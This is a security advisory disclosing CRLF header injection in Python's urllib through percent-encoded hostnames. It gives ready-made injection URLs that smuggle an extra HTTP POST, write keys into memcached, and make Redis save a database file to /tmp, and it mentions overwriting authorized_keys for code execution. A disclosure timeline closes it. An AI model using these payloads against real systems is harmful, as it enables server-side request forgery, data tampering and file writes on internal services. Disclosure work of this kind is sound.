Advisory: HTTP Header Injection in Python urllib

Share this…

Python’s built-in URL library (“urllib2” in 2.x and “urllib” in 3.x) is vulnerable to protocol stream injection attacks (a.k.a. “smuggling” attacks) via the http scheme. If an attacker could convince a Python application using this library to fetch an arbitrary URL, or fetch a resource from a malicious web server, then these injections could allow for a great deal of access to certain internal services.

The Bug

The HTTP scheme handler accepts percent-encoded values as part of the host component, decodes these, and includes them in the HTTP stream without validation or further encoding. This allows newline injections. Consider the following Python 3 script (named fetch3.py):

#!/usr/bin/env python3

import sys
import urllib
import urllib.error
import urllib.request

url = sys.argv[1]

try:
    info = urllib.request.urlopen(url).info()
    print(info)
except urllib.error.URLError as e:
    print(e)

This script simply accepts a URL in a command line argument and attempts to fetch it. To view the HTTP headers generated by urllib, a simple netcat listener was used:

nc -l -p 12345

In a non-malicious example, we can hit that service by running:

./fetch3.py https://127.0.0.1:12345/foo

This caused the following request headers to appear in the netcat terminal:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Connection: close
Host: 127.0.0.1:12345

Now we repeat this exercise with a malicious hostname:

./fetch3.py https://127.0.0.1%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo

The observed HTTP request is:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
X-injected: header
x-leftover: :12345
Connection: close

Here the attacker can fully control a new injected HTTP header.

The attack also works with DNS host names, though a NUL byte must be inserted to satisfy the DNS resolver. For instance, this URL will fail to lookup the appropriate hostname:

https://localhost%0d%0ax-bar:%20:12345/foo

But this URL will connect to 127.0.0.1 as expected and allow for the same kind of injection:

https://localhost%00%0d%0ax-bar:%20:12345/foo

Note that this issue is also exploitable during HTTP redirects. If an attacker provides a URL to a malicious HTTP server, that server can redirect urllib to a secondary URL which injects into the protocol stream, making up-front validation of URLs difficult at best.

Attack Scenarios

Here we discuss just a few of the scenarios where exploitation of these flaws could be quite serious. This is far from a complete list. While each attack scenario requires a specific set of circumstances, there are a vast variety of different ways in which the flaws could be used, and we don’t pretend to be able to predict them all.

HTTP Header Injection and Request Smuggling

The attack scenarios related to injecting extra headers and requests into an HTTP stream have been well documented for some time. Unlike the early request smuggling research, which has a complex variety of attacks, these simple injection would simply allow the addition of extra HTTP headers and request methods. While the addition of extra HTTP headers seems pretty limited in utility in this context, the ability to submit different HTTP methods and bodies is quite useful. For instance, if an ordinary HTTP request sent by urllib looks like this:
GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
Connection: close
Then an attacker could inject a whole extra HTTP request into the stream with URLS like:
https://127.0.0.1%0d%0aConnection%3a%20Keep-Alive%0d%0a%0d%0aPOST%20%2fbar%20HTTP%2f1.1%0d%0aHost%3a%20127.0.0.1%0d%0aContent-Length%3a%2031%0d%0a%0d%0a%7b%22new%22%3a%22json%22%2c%22content%22%3a%22here%22%7d%0d%0a:12345/foo

Which produces:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
Connection: Keep-Alive

POST /bar HTTP/1.1
Host: 127.0.0.1
Content-Length: 31

{"new":"json","content":"here"}
:12345
Connection: close
This kind of full request injection was demonstrated to work against Apache HTTPD, though it may not work against web servers that do not support pipelining or are more restrictive on when it can be used. Obviously this kind of attack scenario could be very handy against internal, unauthenticated REST, SOAP, and similar services. (For example, see: Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2).)

Attacking memcached

As described in the protocol documentation, memcached exposes a very simple network protocol for storing and retrieving cached values. Typically this service is deployed on application servers to speed up certain operations or share data between multiple instances without having to rely on slower database calls. Note that memcached is often not password protected because that is the default configuration. Developers and administrators often operate under the poorly conceived notion that “internal” services of these kinds can’t be attacked by outsiders.
In our case, if we could fool an internal Python application into fetching a URL for us, then we could easily access memcached instances. Consider the URL:
https://127.0.0.1%0d%0aset%20foo%200%200%205%0d%0aABCDE%0d%0a:11211/foo
This generates the following HTTP request:
GET /foo HTTP/1.1
Accept-Encoding: identity
Connection: close
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
set foo 0 0 5
ABCDE
:11211
When evaluating the above lines in light of memcached protocol syntax, most of the above syntax errors. However, memcached does not close the connection upon receiving bad commands. This allows attackers to inject commands anywhere in the request and have them honored. The above request produced the following response from memcached (which was configured with default settings from the Debian Linux package):
ERROR
ERROR
ERROR
ERROR
ERROR
STORED
ERROR
ERROR

The “foo” value was later confirmed to be stored successfully. In this scenario an attacker would be able to send arbitrary commands to internal memcached instances. If an application depended upon memcached to store any kind of security-critical data structures (such as user session data, HTML content, or other sensitive data), then this could perhaps be leveraged to escalate privileges within the application. It is worth noting that an attacker could also trivially cause a denial of service condition in memcached by storing large amounts of data.

Attacking Redis

Redis is very similar to memcached in several ways, though it also provides backup storage of data, several built-in data types, and the ability to execute Lua scripts. Quite a bit has beenpublished about attacking Redis in the last few years. Since Redis provides a TCP protocol very similar to memcached, and it also allows one to submit many erroneous commands before correct ones, the same attacks work in terms of fiddling with an application’s stored data.
In addition, it is possible to store files at arbitrary locations on the filesystem which contain a limited amount of attacker controlled data. For instance, this URL creates a new database file at/tmp/evil:
https://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0aSET%20foo%20bar%0d%0aSAVE%0d%0a:6379/foo
And we can see the contents include a key/value pair set during the attack:
# strings -n 3 /tmp/evil
REDIS0006
foo
bar
In theory, one could use this attack to gain remote code execution on Redis by (over-)writing various files owned by the service user, such as:
 ~redis/.profile
 ~redis/.ssh/authorized_keys
 ...

However, in practice many of these files may not be available, not used by the system or otherwise not practical in attacks.

Versions Affected

All recent versions of Python in the 2.x and 3.x branches were affected. Cedric Buissart helpfully provided information on where the issue was fixed in each:
3.4 / 3.5 : revision 94952
2.7 : revision 94951
While the fix has been available for a while in the latest versions, the lack of follow-though by Python Security means many stable OS distributions likely have not had back patches applied to address it. At least Debian Stable, as of this writing, is still vulnerable.

Responsible Disclosure Log

2016-01-15

Notified Python Security of vulnerability with full details.

2016-01-24

Requested status from Python Security, due to lack of human response.

2016-01-26

Python Security list moderator said original notice held up in moderation queue. Mails now flowing.

2016-02-07

Requested status from Python Security, since no response to vulnerability had been received.

2016-02-08

Response from Python Security. Stated that issue is related to a general header injection bug, which has been fixed in recent versions. Belief that part of the problem lies in glibc; working with RedHat security on that.

2016-02-08

Asked if Python Security had requested a CVE.

2016-02-12

Python Security stated no CVE had been requested, will request one when other issues sorted out. Provided more information on glibc interactions.

2016-02-12

Responded in agreement that one aspect of the issue could be glibc’s problem.

2016-03-15

Requested a status update from Python Security.

2016-03-25

Requested a status update from Python Security. Warned that typical disclosure policy has a 90 day limit.

2016-06-14

RedHat requested a CVE for the general header injection issue. Notified Python Security that full details of issue would be published due to inaction on their part.

2016-06-15

Full disclosure.
Source:https://blog.blindspotsecurity.com/